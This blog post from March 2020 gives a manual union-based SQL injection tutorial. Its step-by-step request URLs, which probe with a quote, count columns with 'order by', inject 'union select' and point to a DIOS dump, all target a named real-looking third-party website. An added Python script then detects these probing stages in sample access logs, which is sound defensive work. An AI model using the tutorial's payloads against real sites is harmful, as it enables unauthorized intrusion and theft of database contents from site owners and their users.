Sunday, 01 March 2020

Manual SQL Injection Tutorial

I'm giving you a manual SQLi tutorial by KrisnaGanz, damn it. Pay close attention, dammit. For the target we'll just use a junk site:

http://www.tzamtzam.co.il/category-products.php?cat=21

To find out whether it's vulnerable or not, put a single quote ( ' ) after the number. If it's vulnerable, you'll see the message *You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1*

Once you've found that, you just add +order+by+1--+- , so it becomes:
http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+1--+-
Keep going until it errors, like this:

http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+1--+-  => No error

http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+2--+-  => No error

http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+3--+-  => No error

http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+4--+-  => No error

http://www.tzamtzam.co.il/category-products.php?cat=21'+order+by+5--+-  => error

Keep going until you get the error, okay dude.

If the error shows up at 5, you list the numbers up to 4, dude, and change *order+by* to *union+select*, so it becomes

http://www.tzamtzam.co.il/category-products.php?cat=21'+union+select+1,2,3,4--+- , Don't forget to add a minus sign ( - ) in front of the number you used for the vulnerability test, so it becomes

http://www.tzamtzam.co.il/category-products.php?cat=-21'+union+select+1,2,3,4--+- , OK

Then the "lottery number" will show up on the page. Say the lottery number = 2, that's where you put your DIOS, OK.

Got it? Whether you got it or not, hopefully it's understandable, guys :D
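Seen from the server side, the quote test, the `order by` counting and the `union select` request leave a recognizable trail in the access log. The following is an added example, not part of the original post, that flags that progression in constructed log lines; the sample client IPs, the stage names and the two-stage alert threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests (client IP, request target); not real traffic.
SAMPLE_LOG = [
    ("198.51.100.4", "/category-products.php?cat=7"),
    ("203.0.113.7", "/category-products.php?cat=21'"),
    ("203.0.113.7", "/category-products.php?cat=21'+order+by+1--+-"),
    ("203.0.113.7", "/category-products.php?cat=21'+order+by+5--+-"),
    ("203.0.113.7", "/category-products.php?cat=-21'+union+select+1,2,3,4--+-"),
    ("192.0.2.9", "/category-products.php?cat=O'Brien"),
]

ORDER_BY = re.compile(r"\border\s+by\s+\d+", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
PLAIN_INT = re.compile(r"[0-9]+\Z")  # what a category id should look like

def classify(value):
    """Name the probing stage a decoded parameter value matches, or None for a plain integer."""
    if PLAIN_INT.match(value):
        return None
    if UNION_SELECT.search(value):
        return "union_select"
    if ORDER_BY.search(value):
        return "order_by"
    if "'" in value:
        return "quote_probe"
    return "non_numeric"

def scan(log, param="cat"):
    """Return {client_ip: [stages in first-seen order]} for one query parameter."""
    seen = {}
    for ip, target in log:
        # parse_qs percent-decodes and turns '+' into a space, as the server would.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            stage = classify(value)
            if stage is not None and stage not in seen.setdefault(ip, []):
                seen[ip].append(stage)
    return seen

def alerts(log, param="cat"):
    """Clients that moved through two or more stages: likely manual enumeration."""
    return sorted(ip for ip, stages in scan(log, param).items() if len(stages) >= 2)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
    print(alerts(SAMPLE_LOG))
```

A single stray quote (the `O'Brien` line) is recorded but does not alert on its own; the alert fires on the progression from one stage to the next.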
